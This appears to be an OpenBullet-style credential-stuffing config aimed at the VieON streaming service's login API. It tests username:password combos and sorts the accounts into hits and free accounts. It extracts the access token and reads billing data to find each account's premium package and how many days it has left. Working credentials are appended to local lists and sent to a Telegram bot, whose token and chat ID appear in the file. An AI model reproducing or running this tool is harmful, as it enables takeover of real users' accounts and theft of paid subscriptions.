HttpRequest xNet POST $"https://api.vieon.vn/backend/user/login/mobile?platform=web&ui=" 
  CONTENT $"phone_number=<USER>&password=<PASS>&device_id=7199174a4d031580905c47f6e0172f7f&platform=web&model=Windows%2010&push_token=&ui=012021" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER $"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36" 
  HEADER $"Pragma: no-cache" 
  HEADER $"Accept: */*" 
  HEADER $"origin: https://vieon.vn" 
  HEADER $"referer: https://vieon.vn/" 
  HEADER $"sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER $"sec-ch-ua-mobile: ?0" 
  HEADER $"sec-fetch-dest: empty" 
  HEADER $"sec-fetch-mode: cors" 
  HEADER $"sec-fetch-site: same-site" 

KeyCheck 
  KEYCHAIN Failure OR 
    KEY $"\":\"Số điện thoại hoặc mật khẩu chưa đúng\"}" 
    KEY $"\"Tài khoản không tồn tại\"}" 
  KEYCHAIN Success OR 
    KEY $"\"is_first_login\":" 
    KEY $"\"status\":1" 
  KEYCHAIN Custom "FREE" OR 
    KEY $"is_premium\":0" 

Parse $"<SOURCE>" LR $"{\"access_token\":\"" $"\"," CreateEmpty=False -> VAR "token" 

#info HttpRequest xNet GET $"https://api.vieon.vn/backend/billing/transaction-success?limit=30&platform=web&ui=" 
  
  HEADER $": scheme: https" 
  HEADER $"accept: application/json, text/plain, */*" 
  HEADER $"accept-encoding: gzip, deflate, br" 
  HEADER $"accept-language: en-US,en;q=0.9,vi;q=0.8" 
  HEADER $"authorization: <token>" 
  HEADER $"sec-ch-ua: \" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"" 
  HEADER $"sec-ch-ua-mobile: ?0" 
  HEADER $"sec-fetch-dest: empty" 
  HEADER $"sec-fetch-mode: cors" 
  HEADER $"sec-fetch-site: same-site" 
  HEADER $"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36" 

#tên_ Parse $"<SOURCE>" LR $"\"name\":\"" $"\"," -> CAP "gói" 
  SAFE 

#expires Parse $"<SOURCE>" LR $"\"expired_date\":\"" $" " CreateEmpty=False -> VAR "expires" 

DateToUnixTime $"<expires>" $"yyyy-MM-dd" -> VAR "DU" 

CurrentUnixTime -> VAR "CU" 

Compute $"((<DU>-<CU>)/86400)" -> VAR "time_out" 

RoundToInt $"<time_out>" -> CAP "số ngày bay lắc" 

KeyCheck 
  KEYCHAIN Custom "FREE" OR 
    KEY $"{\"items\":[],\"" 
  KEYCHAIN Success OR 
    KEY $"VIP" 
    KEY $"All" 
    KEY $"Gói" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<time_out>" Contains $"-" 

#Auto_Hit_telegram TlgSendMessage $"6690631010:AAHC5RDOtXmS5riiQUey5rpofmvyqlpUxQY" $"1407009078" 
  MESSAGE $"<USER>:<PASS> | Gói = <gói> | Date = <expires>" -> VAR "Auto Hit" 

#Export_List_sdt FileAppendLines $"Vieon_list_sdt.txt" 
  CONTENT $"<USER>:<PASS>" 

#Export_list_data FileAppendLines $"Export_List_data.txt" 
  CONTENT $"<USER>:<PASS> | Gói = <gói> | Date = <expires>" 

